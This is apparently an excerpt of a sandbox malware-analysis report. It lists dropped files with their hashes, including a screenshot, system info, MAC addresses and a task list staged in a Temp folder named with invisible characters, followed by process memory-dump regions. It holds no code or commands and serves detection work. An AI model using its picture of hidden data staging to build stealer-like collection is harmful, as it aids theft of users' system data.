ed25384914ace8e8b1a101c31ef7b1d1bf217df43387598b7f90bac1cdf09c01

SHA512
cb2ac8ba92223fc64f7dfcef596b395b0da212b65437408ba53ee7ce9ec59caab61e2f18af1fb3ce856e87bfd22648ac25217755ab5a8caa7f092ca4f97032c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‍ ‎ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‍ ‎ \Display (1).png

Filesize
419KB

MD5
d34932bada2ba60a36eb214032f2a56b

SHA1
17b302a92c13644688d09d8ba37dea27f178742e

SHA256
c518e4fb8617cca6182c704ce4022337f44853e9d3b2f508155aeb3c9f682c90

SHA512
0f9f411a5b7c65610cbdb98d16a064112c3c6193215a937628ca8468bfdac645be2977572f4511a592e4ca02d6ca8b17c0b206936268dfa663c44cf448c8bed4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‍ ‎ \System\MAC Addresses.txt

Filesize
232B

MD5
0cf1357be20ede6223bf21105181f088

SHA1
24b64689a6fb9c4ac7ab634ed3feb2052a61f26c

SHA256
b2d8e705a45cd71fce1e0050c6a3e330d69ec7a442351e85155169777323b2a0

SHA512
2abe5d54b039dfdb0c5b5ec1e25e4f98d317cf541a26f976c394297e289d42eab80be4b5aadcf5a99b3d4b673f16c8769123adc5156624d182ead2dec1cb36ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‍ ‎ \System\System Info.txt

Filesize
2KB

MD5
223626fb7f110eda4047c30199b59589

SHA1
36c33ca10bdc60674f8a0c0180e9f1b2f6d500f1

SHA256
a7a6883e9fd0fc41e1b5c7e46577621aa490ce9a7264ef8bc20821299f2297b1

SHA512
a1aa56f81a446b975f67cc2c78c4a26d2c37b4f30e71454b4e76ade6eb4711c279662cb05cd7967895bff400143f1ffb84184cc179f9eafac819722166962fbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‍ ‎ \System\Task List.txt

Filesize
12KB

MD5
fb8d2e40749789618487d3d66189f553

SHA1
a30b8f4bf3e3115d6bfe3e8693a438eee1e0b335

SHA256
59a464b03b7b825e55d55a90d2416a3d6481aeeac89ef8958e5d67835fa6de73

SHA512
2afd59af6dbfc99fae99f639b293cae99d971dddded4ace869b6ac89fe18a58f948816b00bdfcbb5f293ed9f51e04034314aef4e05221f255d9702ee0b493865

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l4ehwkul\CSC489B6267C98E4C4A94A4BC89D9627AC1.TMP

Filesize
652B

MD5
42c11fa6aa8af82eea8314e2114fc358

SHA1
d70ed2f9d5c7cb0b7937f58d7337e660a1445cd3

SHA256
e5d225cd2621c88326493e1e2e3c1872b00c455b370f681caabc5837af60b78d

SHA512
f5e6e29e9ad8840a166cb2f1c218b6efaf04631339445c55d6d306defbce400ea7da8e16cd831ad1220b0177312e3dd70ea45f97e9b323261ff7f1a95f2344e0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l4ehwkul\l4ehwkul.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l4ehwkul\l4ehwkul.cmdline

Filesize
607B

MD5
92eea65163eda6aebf206166c96e2611

SHA1
e598ffc6bfef4976a0a32cc3f316b10f4908ae35

SHA256
1729e02893b79ee487ef23024f13991a86fe3e412dee6ac4c3c6fb63fed3074e

SHA512
af8429d1dbb80a4fea38b9e971efa851ccd08a5a1aa5030ad94e9ec9d11a4b6defc703586c8118a7912ac5c88b216c0315f537293d771738f5d9fbc552d6bc1f

Download Submit
memory/184-60-0x00007FFAF1F50000-0x00007FFAF20C0000-memory.dmp

Filesize
1.4MB

Download
memory/184-266-0x00007FFAF1F50000-0x00007FFAF20C0000-memory.dmp

Filesize
1.4MB

Download
memory/184-108-0x00007FFAF1F50000-0x00007FFAF20C0000-memory.dmp

Filesize
1.4MB

Download
memory/184-109-0x00007FFAF8490000-0x00007FFAF84A9000-memory.dmp

Filesize
100KB

Download
memory/184-78-0x00007FFAF2780000-0x00007FFAF27AD000-memory.dmp

Filesize
180KB

Download
memory/184-81-0x00007FFAFA0C0000-0x00007FFAFA0D9000-memory.dmp

Filesize
100KB

Download
memory/184-82-0x00007FFAE2C80000-0x00007FFAE2D9C000-memory.dmp

Filesize
1.1MB

Download
memory/184-79-0x00007FFAF6920000-0x00007FFAF692D000-memory.dmp

Filesize
52KB

Download
memory/184-76-0x00007FFAF74F0000-0x00007FFAF7504000-memory.dmp

Filesize
80KB

Download
memory/184-245-0x00007FFAE3120000-0x00007FFAE3709000-memory.dmp

Filesize
5.9MB

Download
memory/184-70-0x00007FFAE3120000-0x00007FFAE3709000-memory.dmp

Filesize
5.9MB

Download
memory/184-187-0x00007FFAF2580000-0x00007FFAF25AE000-memory.dmp

Filesize
184KB

Download
memory/184-188-0x00007FFAEDC90000-0x00007FFAEDD48000-memory.dmp

Filesize
736KB

Download
memory/184-189-0x0000019B08C20000-0x0000019B08F99000-memory.dmp

Filesize
3.5MB

Download
memory/184-58-0x00007FFAF2750000-0x00007FFAF2773000-memory.dmp

Filesize
140KB

Download
memory/184-73-0x00007FFAE2DA0000-0x00007FFAE3119000-memory.dmp

Filesize
3.5MB

Download
memory/184-74-0x00007FFAF30B0000-0x00007FFAF30D3000-memory.dmp

Filesize
140KB

Download
memory/184-71-0x00007FFAEDC90000-0x00007FFAEDD48000-memory.dmp

Filesize
736KB

Download
memory/184-66-0x00007FFAF2580000-0x00007FFAF25AE000-memory.dmp

Filesize
184KB

Download
memory/184-64-0x00007FFAF76B0000-0x00007FFAF76BD000-memory.dmp

Filesize
52KB

Download
memory/184-62-0x00007FFAF8490000-0x00007FFAF84A9000-memory.dmp

Filesize
100KB

Download
memory/184-261-0x00007FFAF30B0000-0x00007FFAF30D3000-memory.dmp

Filesize
140KB

Download
memory/184-72-0x0000019B08C20000-0x0000019B08F99000-memory.dmp

Filesize
3.5MB

Download
memory/184-107-0x00007FFAF2750000-0x00007FFAF2773000-memory.dmp

Filesize
140KB

Download
memory/184-260-0x00007FFAE2DA0000-0x00007FFAE3119000-memory.dmp

Filesize
3.5MB

Download
memory/184-48-0x00007FFAFB0D0000-0x00007FFAFB0DF000-memory.dmp

Filesize
60KB

Download
memory/184-206-0x00007FFAE2DA0000-0x00007FFAE3119000-memory.dmp

Filesize
3.5MB

Download
memory/184-223-0x00007FFAF1F50000-0x00007FFAF20C0000-memory.dmp

Filesize
1.4MB

Download
memory/184-232-0x00007FFAF74F0000-0x00007FFAF7504000-memory.dmp

Filesize
80KB

Download
memory/184-217-0x00007FFAE3120000-0x00007FFAE3709000-memory.dmp

Filesize
5.9MB

Download
memory/184-218-0x00007FFAF30B0000-0x00007FFAF30D3000-memory.dmp

Filesize
140KB

Download
memory/184-30-0x00007FFAF30B0000-0x00007FFAF30D3000-memory.dmp

Filesize
140KB

Download
memory/184-54-0x00007FFAF2780000-0x00007FFAF27AD000-memory.dmp

Filesize
180KB

Download
memory/184-265-0x00007FFAF2750000-0x00007FFAF2773000-memory.dmp

Filesize
140KB

Download
memory/184-273-0x00007FFAE2C80000-0x00007FFAE2D9C000-memory.dmp

Filesize
1.1MB

Download
memory/184-25-0x00007FFAE3120000-0x00007FFAE3709000-memory.dmp

Filesize
5.9MB

Download
memory/184-272-0x00007FFAF6920000-0x00007FFAF692D000-memory.dmp

Filesize
52KB

Download
memory/184-271-0x00007FFAF74F0000-0x00007FFAF7504000-memory.dmp

Filesize
80KB

Download
memory/184-270-0x00007FFAEDC90000-0x00007FFAEDD48000-memory.dmp

Filesize
736KB

Download
memory/184-269-0x00007FFAF2580000-0x00007FFAF25AE000-memory.dmp

Filesize
184KB

Download
memory/184-268-0x00007FFAF76B0000-0x00007FFAF76BD000-memory.dmp

Filesize
52KB

Download
memory/184-267-0x00007FFAF8490000-0x00007FFAF84A9000-memory.dmp

Filesize
100KB

Download
memory/184-56-0x00007FFAFA0C0000-0x00007FFAFA0D9000-memory.dmp

Filesize
100KB

Download
memory/184-264-0x00007FFAFA0C0000-0x00007FFAFA0D9000-memory.dmp

Filesize
100KB

Download
memory/184-263-0x00007FFAF2780000-0x00007FFAF27AD000-memory.dmp

Filesize
180KB

Download
memory/184-262-0x00007FFAFB0D0000-0x00007FFAFB0DF000-memory.dmp

Filesize
60KB

Download
memory/3584-88-0x00000188B11B0000-0x00000188B11D2000-memory.dmp

Filesize
136KB

Download
memory/4080-142-0x00000160D2570000-0x00000160D2578000-memory.dmp

Filesize
32KB

Download